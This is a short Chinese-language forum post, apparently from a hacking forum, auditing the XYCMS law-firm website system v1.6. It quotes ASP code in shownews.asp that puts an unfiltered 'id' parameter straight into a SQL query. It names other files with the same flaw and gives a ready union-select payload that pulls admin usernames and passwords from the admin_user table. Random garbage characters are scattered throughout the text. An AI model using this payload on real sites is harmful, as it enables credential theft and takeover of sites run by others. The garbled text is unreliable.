前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似" C( g- I8 m9 y2 g# b
3 u" S/ r0 E& d
淫荡分割线: _, C' A# _ X& E. h
--------------------------------------------------------
4 T& Y- Q0 B8 I; X6 C- {
: e' N" o; h+ j2 Y审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)! P( P O7 V/ {6 E: C+ J
源码地址:http://down.chinaz.com/soft/29233.htm
6 D% f# w- I+ h" ]$ j% x ! j2 i& v3 Q) U+ W
漏洞文件:shownews.asp
, s" j, w+ i8 |9 p漏洞代码:7-13行
, n/ {7 x- X# |# q
, t/ V8 z3 E+ r
f( j, H7 A& d% T' ?<% . r" _7 ^$ q4 ]! \
id=request.QueryString("id")
# G* e8 z( j: a6 Q# c& o
+ p( d3 |# K6 q* X! S bset snews=server.createobject("adodb.recordset")
3 B w6 S1 y# c4 Y9 xexec="select * from [news] where id="&id
8 f3 e& H' H8 D$ msnews.open exec,conn,1,1
8 s8 ~; [7 p3 F/ H1 ^9 K7 x* n b. G%>: J; K! T7 k: B/ D7 _
9 q- ]0 x( _: i6 M8 V6 J$ M
; {% n2 V! d2 n! Q0 W) |: O什么过滤都没有 直造成注入* w/ X; Z2 U* c% O6 T1 E/ c+ j! |
0 {1 \7 u' a! c# j- c1 w$ v6 A# p注入点:http://127.0.0.1:99/shownews.asp?id=xx. p% P* I0 N& F1 u z
+ o- N. I8 @5 t3 ]4 C其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
3 n% W% t* T0 V3 O% N) S + h. Z- L3 m/ h# m+ y
) L$ p" i; e( j6 ]% iexp: union select 1,admin,password,4,5,7 from admin_user
4 U; ?+ k e2 N! I2 U5 J: D* r9 }$ b! f% C3 M! N! q
|